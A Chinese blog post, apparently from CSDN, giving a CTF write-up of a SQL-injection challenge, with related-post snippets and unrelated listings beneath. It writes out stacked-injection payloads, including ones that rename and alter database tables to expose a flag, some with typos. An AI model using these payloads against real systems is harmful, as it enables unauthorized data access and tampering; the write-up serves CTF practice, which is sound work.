[强网杯 2019]随便注 1

于 2021-04-12 19:34:34 发布
阅读量79 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/su382483531/article/details/115634040
版权

首先输入1’ 发现错误, 并且知道数据库看为MariaDB, 同时MariaDB与MySQL语法基本相同。
在这里插入图片描述
然后输入1’ and 1=1#返回正确说明有SQL注入点
在这里插入图片描述
之后按照一般流程查看其列数输入 -1‘ and order by 3#出现错误,而-1‘ and order by 2#正确则说明,列数为2。

于是使用查询语句-1’ and select 1,database(),返回下图,可以知道select被过滤了,因而可以使用堆叠注入。
在这里插入图片描述
1’;show databases; 查看数据库
在这里插入图片描述
后用 1’;show tables ;#查询表
在这里插入图片描述
再查询1919810931115414表中的字段,1’;show columns form 1919810931114514;#
在这里插入图片描述
接下来就是骚操作了,我们可以知道本题默认显示的应为words中的字段,因而我们可以通过改名来让它显示flag
1’;rename tables words to words1;rename tables 1919810931114514 to words; alter table words change flag id varchar(100);#
然后便可得
在这里插入图片描述

Violet&
关注
专栏目录
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
【BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 4085
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
BUUCTF-WEB:[强网杯 2019]随便 1
_Co1a
01-24 985
题目环境:http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn 打开环境: 尝试入: 解题思路: 1、先尝试用union联合入:第一步、测试入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型 1' [error] 1'# [不报错,正常回显] 1' and 1=1# ...
buuctf [强网杯 2019]随便 1
热门推荐
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
[强网杯 2019]随便.docx
12-18
强网杯 2019】SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
强网杯-upload1
08-08
在"强网杯-upload1"这个挑战中,我们面对的是一个网络安全相关的解题任务。题目提供的数据是一个名为"data.pcapng"的网络流量捕获文件,这类文件通常用于分析网络通信中的数据包。使用Wireshark这样的网络封包分析...
2018强网杯CTF-题目整理-校本图片Readme.zip
12-18
强网杯 2018强网杯CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── ...
经济补偿金、赔偿金的核定及劳动合同解除后双方的义务.ppt
09-14
经济补偿金、赔偿金的核定及劳动合同解除后双方的义务.ppt
配电网分布式电源和储能选址定容 以配电网总成本最低为目标函数,其中包括年运行成本,设备维护折损成本、环境成本;以系统潮流运行为约
09-14
配电网分布式电源和储能选址定容 以配电网总成本最低为目标函数,其中包括年运行成本,设备维护折损成本、环境成本;以系统潮流运行为约束条件,采用粒子群算法求解,实现光伏、风电、储能设备的规划。 这是一个使用粒子群算法进行优化的程序。下面我将对程序进行详细的分析和解释。 首先,程序开始时加载了一些数据文件,包括光伏、风电和负荷的数据。然后,定义了一些参数,如蓄电池参数、迭代次数、种群大小、速度更新参数等。 接下来,程序进行了种群的初始化。使用随机数生成种群的初始位置,并初始化速度。然后,对种群中的每个个体进行潮流计算,并计算适应度。适应度的计算包括对电压、网损等进行评估,并考虑了一些约束条件,如储能容量、光伏容量等的限制。 接下来,程序进行了迭代优化过程。在每次迭代中,根据当前的速度和位置,更新粒子的速度和位置。然后,对更新后的粒子进行潮流计算,并计算适应度。如果个体的适应度优于个体历史最佳适应度,则更新个体历史最佳适应度和位置。如果个体的适应度优于全局最佳适应度,则更新全局最佳适应度和位置。 程序通过迭代优化过程不断更新粒子的速度和位置,直到达到指定的迭代次数。最后,程序输出优化结
Cpp-halcono-pencv互相转换
09-14
Cpp_halcon_opencv互相转换 python halcon_opencv图像变量互相转换 C++ halcon 和opencv 图像变量互相转换 VS2022工程 无需配置环境即可 使用绝对路径 无需配置 无需配置 无需配置 下载即可编译生成 仅限交流学习使用;仅限交流学习使用;仅限交流学习使用;
××部20xx年人员裁员分流方案表.xlsx
09-14
××部20xx年人员裁员分流方案表.xlsx
『人事流程图新』会前准备工作管理流程图.docx
09-14
『人事流程图新』会前准备工作管理流程图.docx
遗传算法优化频率抽样法非零点插入_GeneA.zip
09-14
遗传算法优化频率抽样法非零点插入_GeneA
基于ssm的商会管理系统设计与实现.docx
09-14
基于ssm的商会管理系统设计与实现.docx
MATLAB的贪吃蛇系统GUI设计.zip
09-14
vscode
数据库SQL实战题目汇总.zip
最新发布
09-14
sql
基于ssm的博客系统设计与实现.docx
09-14
基于ssm的博客系统设计与实现.docx
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值